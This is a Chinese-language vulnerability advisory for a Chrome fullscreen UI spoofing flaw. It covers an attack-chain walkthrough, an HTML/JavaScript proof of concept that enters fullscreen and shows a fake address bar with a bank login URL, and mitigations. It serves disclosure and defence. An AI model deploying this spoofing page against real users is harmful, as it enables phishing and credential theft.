CVE-2026-8561 Google Chrome全屏UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-8561

漏洞类型

UI欺骗

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

Google Chrome 在 148.0.7778.168 之前的版本中存在安全漏洞，主要涉及全屏模式下的安全用户界面显示不正确。该漏洞允许远程攻击者通过精心制作的 HTML 页面实施 UI 欺骗攻击。由于漏洞利用需要用户交互，攻击者可诱导用户进入全屏模式并覆盖或伪造浏览器界面元素，从而骗取用户信任。此漏洞被评估为中等严重性，可能导致用户机密信息泄露或轻微的可用性影响。

技术细节

该漏洞的核心在于 Chrome 浏览器在处理全屏 API 时，未能正确渲染或隔离关键的安全 UI 指示器。通常情况下，当网页进入全屏模式时，浏览器应强制显示地址栏或特定的权限提示，以告知用户当前处于全屏状态并防止页面模拟系统界面。然而，受影响的版本存在逻辑缺陷，攻击者可以利用 HTML 和 CSS 构建伪造的浏览器地址栏或系统对话框，并将其覆盖在全屏视图的顶部。由于真实的浏览器提示被隐藏或设计得不够明显，用户很难区分伪造的 UI 和真实的浏览器组件。攻击者利用这一机制，结合社会工程学手段，诱导用户在伪造的界面中输入敏感凭据或下载恶意文件，从而绕过浏览器的安全防御机制。

攻击链分析

STEP 1

步骤1

攻击者构建包含恶意 HTML 和 JavaScript 代码的网页，设计伪造的浏览器地址栏或安全提示 UI。

STEP 2

步骤2

攻击者通过钓鱼邮件或社交媒体诱导受害者访问该恶意网页。

STEP 3

步骤3

网页诱导用户点击按钮（如“播放视频”），触发浏览器的 Fullscreen API 请求。

STEP 4

步骤4

浏览器进入全屏模式，由于漏洞存在，恶意脚本立即显示伪造的 UI 元素覆盖在屏幕顶部。

STEP 5

步骤5

受害者误以为伪造的地址栏是真实的，从而在虚假的安全上下文中输入敏感信息或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-8561: Chrome Fullscreen UI Spoofing
This script demonstrates how a crafted HTML page can trigger fullscreen
and display a fake address bar to mislead the user.
-->
<html>
<head>
<style>
  /* Style to mimic a browser address bar */
  #fake-toolbar {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 40px;
    background-color: #f1f3f4;
    border-bottom: 1px solid #ccc;
    z-index: 9999;
    font-family: Arial, sans-serif;
    padding: 10px;
    box-sizing: border-box;
  }
  #url-box {
    background-color: white;
    border: 1px solid #dfe1e5;
    border-radius: 20px;
    padding: 5px 15px;
    width: 80%;
    margin: 0 auto;
    color: #5f6368;
  }
</style>
</head>
<body>

<div id="fake-toolbar">
  <div id="url-box">https://www.secure-bank.com/login</div>
</div>

<div style="text-align: center; margin-top: 100px;">
  <h2>Click to Start Video</h2>
  <button onclick="triggerExploit()">Play</button>
</div>

<script>
  function triggerExploit() {
    var elem = document.documentElement;
    // Request fullscreen to trigger the vulnerability context
    if (elem.requestFullscreen) {
      elem.requestFullscreen().then(() => {
        // Show the fake UI immediately after entering fullscreen
        document.getElementById('fake-toolbar').style.display = 'block';
      }).catch(err => {
        console.error('Error attempting to enable fullscreen:', err.message);
      });
    }
  }
</script>

</body>
</html>

影响范围

Google Chrome < 148.0.7778.168

防御指南

临时缓解措施

建议用户立即检查并更新 Google Chrome 浏览器到最新修补版本。对于无法立即更新的环境，应限制浏览器全屏 API 的使用权限，或使用浏览器扩展插件来管理全屏行为。用户在遇到网页突然请求全屏或显示异常 UI 时，应手动退出全屏模式（按 Esc 键）并验证当前页面的真实性。